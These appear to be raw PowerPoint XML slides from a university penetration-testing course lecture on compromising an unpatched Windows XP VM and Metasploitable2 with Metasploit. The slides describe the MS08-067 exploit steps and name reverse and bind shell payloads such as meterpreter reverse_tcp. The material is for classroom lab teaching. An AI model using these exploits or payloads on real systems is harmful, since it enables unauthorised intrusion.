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82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321" r:id="rId10"/>
    <p:sldId id="324" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="322" r:id="rId13"/>
    <p:sldId id="323" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="315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16" r:id="rId25"/>
    <p:sldId id="301" r:id="rId26"/>
    <p:sldId id="302" r:id="rId27"/>
    <p:sldId id="303" r:id="rId28"/>
    <p:sldId id="304" r:id="rId29"/>
    <p:sldId id="305" r:id="rId30"/>
    <p:sldId id="306" r:id="rId31"/>
    <p:sldId id="319" r:id="rId32"/>
    <p:sldId id="307" r:id="rId33"/>
    <p:sldId id="320" r:id="rId34"/>
    <p:sldId id="308" r:id="rId35"/>
    <p:sldId id="318" r:id="rId36"/>
    <p:sldId id="309" r:id="rId37"/>
    <p:sldId id="310" r:id="rId38"/>
    <p:sldId id="311" r:id="rId39"/>
    <p:sldId id="312" r:id="rId40"/>
    <p:sldId id="313" r:id="rId41"/>
    <p:sldId id="314" r:id="rId4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 autoAdjust="0"/>
    <p:restoredTop sz="94261" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="156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917B9F1A-4BA7-4F42-8B30-B390DAD022BE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022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FDAA574-78F9-4CF3-B5AA-FBB7FA6294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87858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9D32125-C21D-4793-A6E9-AEA3A2E01112}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203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326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0905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8133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3449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6219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9629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5655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6113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9417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84366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965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7176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1681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5795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3499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9315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2433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5869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00854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96598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1893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8530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57939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35742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93165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08887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7316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7193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84364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3675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36806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5658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7437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7060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0110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0924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848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61000" cy="40894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7064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DE35B27-722D-479F-AE8A-9D1E19209290}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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87CAC18-B632-4DC6-9D20-180F256059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9243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1ECBB1-4F72-42EE-962D-8D619EADA197}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022</a:t>
            </a:fld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4E5EE-EF7A-4CE2-B37B-14BAE1F610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980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A0A553-A8E7-4033-AF4F-9980AF19E86A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022</a:t>
            </a:fld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B17EBF-D0FB-40F0-A4D8-34F2BB57DD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3209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8693E0-2FBC-411A-9E2D-7BB679E8A33B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022</a:t>
            </a:fld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1CCE37-9B19-4A1F-B317-C426BEA3A6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3445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043A202-D693-4DA3-A9D5-41F5562821BE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022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D6B3CBA-5C7D-47E3-A184-0130CB1E79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3057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480137-D48C-480B-AE9D-C2DBF8E0F16F}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022</a:t>
            </a:fld>
            <a:endParaRPr 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A25685-DB8E-4829-B9B3-CE34A8BF29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2700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sz="45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EB63DA3-CF07-422A-A7E7-C8441FF20691}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022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E91BAAF-10C9-4D5C-B00C-BD2C99104B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5921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DE1C78-DF78-4C5A-BED5-B7B03F45249D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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847665-8DC7-4493-BA40-B8EA76442C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919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F791A91-6368-4A9F-88C2-2E770D74C8B6}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022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DB3FCD1-4044-4BBE-9287-C051EDB04A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9003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4BF6B36-06ED-4FC9-B0B9-9D9BCCE0151F}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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BC77BD9-FC36-4170-B92B-0E524E53BD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402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/>
          <a:p>
            <a:pPr indent="-283464" eaLnBrk="1" fontAlgn="auto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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr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Flowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr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5DBAFADE-C3E5-4677-BEB9-6FE45F39E270}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022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8454FA-D2CA-45BD-8EC6-F18E282C5B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3734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F7E20E7B-79D4-4A4B-BC1A-D3DB2493F6F8}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/15/2022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B5A788"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9F0EAAAB-7DAD-46A1-BDC6-93D81DFB6C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2" r:id="rId2"/>
    <p:sldLayoutId id="2147483888" r:id="rId3"/>
    <p:sldLayoutId id="2147483883" r:id="rId4"/>
    <p:sldLayoutId id="2147483889" r:id="rId5"/>
    <p:sldLayoutId id="2147483884" r:id="rId6"/>
    <p:sldLayoutId id="2147483890" r:id="rId7"/>
    <p:sldLayoutId id="2147483891" r:id="rId8"/>
    <p:sldLayoutId id="2147483892" r:id="rId9"/>
    <p:sldLayoutId id="2147483885" r:id="rId10"/>
    <p:sldLayoutId id="214748388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30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9pPr>
      <a:extLst/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ecurelayer7.net/attacking-metasploitable-2-using-metasploi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cf.edu/~czou/temp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pid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploi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ffensive-security.com/metasploit-unleashed/about-meterpreter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ffensive-security.com/metasploit-unleashed/meterpreter-basics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ecurity-updates/securitybulletins/2009/ms09-001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hyperlink" Target="https://www.youtube.com/watch?v=JH6BHVbZiPs&amp;list=PLyYk0ysrovkXv_ltYm1QQrd1dOLw0VItj&amp;index=3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ecurity-updates/SecurityBulletins/2010/ms10-018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results?search_query=metasploit+attack+MS10-018" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=BL43nXM0vS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KppQMwoMd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iteshshah.github.io/linux/kali/how-to-fix-metasploit-database-not-connected-or-cache-not-buil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1" y="360362"/>
            <a:ext cx="7772400" cy="1697037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>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Exploiting 2: Compromising Target by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0" err="1">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700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2514600"/>
            <a:ext cx="7407275" cy="1752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b="1" dirty="0"/>
              <a:t>CIS 6395, Incident Response Technologies</a:t>
            </a:r>
          </a:p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b="1" dirty="0"/>
              <a:t>Fall 2022, Dr. Cliff Zou</a:t>
            </a:r>
          </a:p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dirty="0"/>
              <a:t>changchun.zou@ucf.edu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9221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876800"/>
            <a:ext cx="2438400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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> Attacks towards Metasploitable2 Linux VM</a:t>
            </a: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342900" y="1295400"/>
            <a:ext cx="8458200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1pPr>
            <a:lvl2pPr marL="914400" indent="-45720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800" dirty="0"/>
              <a:t>A good tutorial on other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> attacks: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sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.securelayer7.net/attacking-metasploitable-2-using-metasploit/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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8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800" dirty="0"/>
              <a:t>Demonstrate the following attacks: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/>
              <a:t>Samba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/>
              <a:t>Tomcat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 err="1"/>
              <a:t>UnrealIRCD</a:t>
            </a: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2062982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1447800" y="2514600"/>
            <a:ext cx="7407275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36538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panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:buChar char="◦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32D2E"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707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69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b="1" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> to Exploit Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  Virtual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145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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Set Up Vulnerable WinXP Virtual Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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457200" y="1600200"/>
            <a:ext cx="82296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/>
              <a:t>Step 1: Download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> VM from Microsoft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000" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>developer.microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>-us/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>-edge/tools/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/ 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000" dirty="0"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> VM is not available on this site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Luckily, I have a version downloaded two years ago</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="20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/>
              <a:t>Step 2: Imported into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> and run it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/>
              <a:t>Step 3: Disable “automatic update” feature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/>
              <a:t>Step 4:  Remove ALL windows security patches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 dirty="0"/>
              <a:t>“control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>panel”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/remove programs”  click “show update”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 dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Remove each security patch one-by-one!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>More than 60 security patches, so be patient! It takes about 30 minutes to remove all security patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Ignore all warnings during removal, and choose “do not restart now” option before finishing a removal to save time</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty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506274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14400"/>
            <a:ext cx="68865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65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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Set Up Vulnerable WinXP Virtual Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1415461"/>
            <a:ext cx="82296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800" dirty="0"/>
              <a:t>For your convenience, I have produced a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> VM for you to download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400" dirty="0"/>
              <a:t>I use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> “File” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> “Export appliance” to generate a single .ova file of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> after removing all security patches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400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Download from:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.ucf.edu/~czou/temp/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2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000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>About 1.3GB size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400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The unpatched version can only last 30 days before its license expires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400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>You can also download the original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM image from the same place, and remove security patches by yourself in order to use it for the next 30 days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3132598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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Set Up Vulnerable WinXP Virtual Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Notes: 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400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Do not use this Windows IE browser to browse Internet, otherwise your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> could be quickly compromised by “drive-by download” attack!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US" altLang="en-US" sz="2400" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRP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400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM will expire after 30 days, so this vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM image will also expire after 30 days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Although can still be used, but will be slow and annoying with many warning messages, and eventually stops working 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4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7289118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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>What Critical Vulnerabilities does This WinXP Have?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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/>
              <a:t>Simple approach:  Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> or Nessus!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/>
              <a:t>6 critical vulnerabilities found by Nessus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 dirty="0"/>
              <a:t>The included IE8 or IE6 may have additional vulnerabilities (will discuss later)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329210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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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457200" y="1600200"/>
            <a:ext cx="82296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/>
              <a:t>Step 1: Find attack module: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/>
              <a:t>Step 2: load the attack module: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/>
              <a:t>Step 3: load desired attack payload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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1024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1200"/>
            <a:ext cx="841057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191000"/>
            <a:ext cx="58547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808" y="5715000"/>
            <a:ext cx="8058979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442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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="82296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/>
              <a:t>Good tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit</a:t>
            </a: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/>
              <a:t>Two popular shell payloads for most Windows exploits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 dirty="0"/>
              <a:t>Bind:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600" dirty="0"/>
              <a:t>A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/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 dirty="0"/>
              <a:t>Reverse:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600" dirty="0"/>
              <a:t>it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/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 dirty="0"/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 dirty="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>upexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600" dirty="0"/>
              <a:t>Generate a Windows style command line shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600" dirty="0"/>
              <a:t>Like running the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>” under Windows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 dirty="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/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000" dirty="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/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9697877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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
